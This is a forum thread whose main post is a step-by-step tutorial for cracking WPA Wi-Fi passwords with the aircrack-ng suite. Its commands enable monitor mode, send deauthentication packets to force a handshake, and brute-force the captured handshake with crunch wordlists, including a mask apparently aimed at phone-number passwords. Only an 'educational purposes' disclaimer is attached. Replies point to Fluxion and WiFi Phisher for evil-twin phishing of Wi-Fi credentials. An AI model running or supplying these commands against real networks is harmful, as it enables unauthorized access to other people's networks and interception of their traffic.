What's new

Tutorial Häçk Wifi - from CyberBash [PC/Laptop] | "open4all" thread

PHCs Echelon

Forum Guru
Elite
Joined
Aug 24, 2019
Posts
2,020
Solutions
14
Reaction
8,150
Points
1,433
Age
23
⚠️ This tutorial basically just for expert and some computer skilled, —or person who already have experience initiating sniffing.


*ps: requires knowledge/skills about sniffing so don't bother yourself commenting "trash lods, walang pang beginner".
Shallll we start?



You must have a wifi adapter that supports packet injection and monitor mode :
  1. plug in wifi adapter to make sure wifi adapter is connected
$ iwconfig
  • To kill all conflicting processes
$airmon-ng check kill
$ airmon-ng start wlan0

2. Close terminal and open new terminal (1)

$ airodump-ng wlan0mon //displays networks
3. Click ctrl+c to stop
*leave terminal open

5. Open new terminal (2)
$ airodump-ng -c (channel) -w capture --bssid (BSSID) wlan0mon
6. Scan starts to look for connected devices
*leave terminal open

7. Open new terminal (3)
$ aireplay-ng -0 5 -a (BSSID) -c (DEVICE BSSID) wlan0mon
  • it will attempt to get a handshake, shown in terminal (2) (top right corner)
*handshake (.cap) file will be moved into root directory

8. In same terminal, use crunch to make word list and try and (c)rack handshake.
$ crunch (min#) (max#) -t 548%%%%%%% 1234567890 | air(c)rack-ng -w - capture-01.cap -e (ESSID)
[delete "()"]
*it will attempt to (c)rack password..


9. To try and (c)rack handshake using existing wordlist.
  • (C)rack handshake file(.cap) using wordlist
$ air(c)rack-ng /file/flow/of/handshake.cap -w /wordlist/flow.txt
[delete "()"]
*buy yourself a cup of PHC Tea, treat yourself naman.





*Note: All step-by-step procedure is just for Educational Purposes Only [you won this time]


all credits to CyberBash
 
Last edited:
Sir ano meaning nito? May sample ka?

"You must have a wifi adapter that supports packet injection and monitor mode" thanks for the tut
 
try lods yung build in wifi adaptor ng laptop meron iba supported na monitoring
 
Sa mga di masyado maalam at naka Gnu Linux ang Distro Airgeddon, Fluxion or WiFi Phisher gamitin nyo.
 

Similar threads

Back
Top